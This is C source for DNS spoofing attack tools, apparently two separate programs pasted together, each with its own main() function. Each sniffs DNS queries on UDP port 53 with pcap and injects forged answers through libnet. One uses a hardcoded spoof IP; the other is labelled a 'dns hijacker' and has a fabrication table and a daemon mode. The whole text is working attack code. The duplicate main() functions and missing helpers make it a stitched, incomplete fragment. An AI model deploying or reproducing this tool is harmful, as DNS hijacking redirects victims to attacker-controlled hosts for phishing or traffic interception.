int main(int argc, char **argv) {
char *spoof_addr;
char *site_name;
char temp_site[128];
char *device;
char filter[1024]; /* Capture filter */
char errbuf[PCAP_ERRBUF_SIZE]; /* Error buffer */
pcap_t* capdev; /* Capturing Device */
const u_char *packet = NULL;
struct pcap_pkthdr pcap_hdr; /* Pcap packet header */
libnet_t *handler; /* Libnet handler */
int var;
/* reserve the space for the spoofed packet */
memset(&spoofpacket, '\0', sizeof(struct sp));
/* get the spoofing IP address from input */
spoof_addr = "222.106.38.120";
site_name = "example.com";
if (argc >= 2)
spoof_addr = argv[1];
if (argc >= 3)
site_name = argv[2];
if (strncmp(site_name, "www", 3) != 0) {
strncpy(temp_site, "www.", 4);
strcpy(temp_site+4, site_name);
site_name = temp_site;
}
/* get a device to sniff on */
device = pcap_lookupdev(errbuf);
if (device == NULL) {
printf("%s\n", errbuf);
exit(1);
}
strcpy(filter, "udp dst port 53");
/* Setup for sniffering */
capdev = set_cap_dev(device, filter);
printf("Sniffering on: %s\n", device);
printf("Spoofing address: %s\n", spoof_addr);
for (;;)
{
packet = pcap_next(capdev, &pcap_hdr);
/* Grab a packet */
/**** USE: pcap function to grab next packet****/
if (packet == NULL)
{
continue;
}
// printf("Packet Length%d\n", pcap_hdr.len);
//printf("Return value: %d", var);
/* If the packet is a DNS query, create a packet */
if ((analyze_packet(packet, (int)pcap_hdr.caplen, spoof_addr, site_name)) == 1)
{
// printf("DNS packet found\n");
// Inject the spoofed DNS response
// printf("Device: %s", device);
spoof_dns(device);
// printf("YAY! DNS packet sent\n");
// return 1;
}
}
return 0;
}
int main (int argc, char **argv) {
int i,
opt,
socket; /* socket to write on */
char *packet, /* captured packet */
*device = NULL, /* interface to sniff on */
*ft_filename = NULL, /* fabrication table filename */
*output_filename = NULL, /* output statistics filename */
filter[1024], /* tcpdump style capture filter */
errbuf[PCAP_ERRBUF_SIZE]; /* error buffer for pcap */
pid_t pid; /* used in daemonizing */
FILE *os; /* output statistics file handle */
struct pcap_pkthdr pcap_h; /* pcap packet header */
pcap_t *capdev; /* the capture device */
/*
* catch sig
*/
/*if (signal(SIGINT, catch_signals) == SIG_ERR) {
perror ("sigset failed for SIGINT");
exit (EXIT_FAILURE);
}*/
/*
* prepare the chewy center
*/
memset(&chewycenter, '\0', sizeof(struct cc));
/*
* parse the command line
*/
while ((opt = getopt(argc, argv, "d:f:hi:o:psvz")) != EOF) {
switch (opt) {
case 'd': /* default answer */
chewycenter.default_answer = optarg;
dflag++;
break;
case 'f': /* fabrication table */
ft_filename = optarg;
fflag++;
break;
case 'i': /* interface */
device = optarg;
break;
case 'o': /* output statistics filename */
output_filename = optarg;
oflag++;
break;
case 'p': /* print only */
pflag++;
break;
case 's': /* supress printing of "ignored *" */
sflag++;
break;
case 'v': /* verbose */
vflag++;
break;
case 'z': /* daemonize */
zflag++;
break;
case 'h': /* usage */
case '?':
usage(argv);
break;
}
}
/*
* if there is no default spoof address or fabrication table specified
* and the user doesn't just want to print captured dns packets
* then we have a problem, because we have no idea what to spoof answers with
*/
if (!dflag && !fflag && !pflag)
usage(argv);
/*
* if a fabrication table file was specified fill the ftable with values from it
*/
if (fflag)
fill_table(ft_filename);
/*
* daemonize if we have to
* we do this after we fill the table because we chdir() here
*/
if (zflag) {
pid = fork();
if (pid < 0) {
printf("\ncould not daemonize");
exit (EXIT_FAILURE);
}
if (pid != 0)
exit (EXIT_SUCCESS);
fclose(stdin); fclose(stdout); fclose(stderr);
setsid();
chdir("/");
umask(0);
}
/*
* make sure there is a device to sniff on
*/
if (!device)
device = pcap_lookupdev(errbuf);
if (!device) {
fprintf(stderr, "\ndevice lookup failed");
exit (EXIT_FAILURE);
}
/*
* set capture filter
* defaults to only capturing traffic destined to a nameserver
*/
argc -= optind;
argv += optind;
strcpy(filter, "udp dst port 53");
if (argc != 0) {
strcat(filter, " and ");
strcat(filter, copy_argv(argv));
}
/*
* prepare the device for capturing
*/
capdev = set_cap_dev(device, filter);
/*
* if we're not only watching grab a socket to write on
*/
if (!pflag)
if ((socket = libnet_open_raw_sock(IPPROTO_RAW)) == -1)
libnet_error(LIBNET_ERR_FATAL, "network initialization failed\n");
/*
* print some informative information
*/
printf("\n[ dns hijacker %s ]\n", VERSION);
printf("\nsniffing on: %s", device);
printf("\nusing filter: %s", filter);
if (dflag) printf("\ndefault answer: %s", chewycenter.default_answer);
if (fflag) printf("\nfabrication table: %s", ft_filename);
if (pflag) printf("\nprint only mode");
if (sflag) printf("\nsuppressing ignored activity output");
printf("\n");
/*
* main loop
* this is where it all happens...
* - sniff a packet
* - parse through that packet printing packet information and
* store relevant values in our struct
* - build an appropriate fabricated answer and
* store it in our struct
* - if we're not only watching
* write the packet
* - if we want to store statistics and we're not only watching
* open, write to, and close the statistics file
*/
for (;;) {
packet = (u_char *)pcap_next(capdev, &pcap_h);
if (packet == NULL)
continue;
parse_dns(packet, (int)pcap_h.caplen);
if (!pflag)
spoof_dns(socket);
if (oflag && !pflag) {
os = fopen(output_filename, "w+");
fprintf(os, "%d", num_spoofed_answers);
fclose(os);
}
}
/* not reached */
return (EXIT_SUCCESS);
}
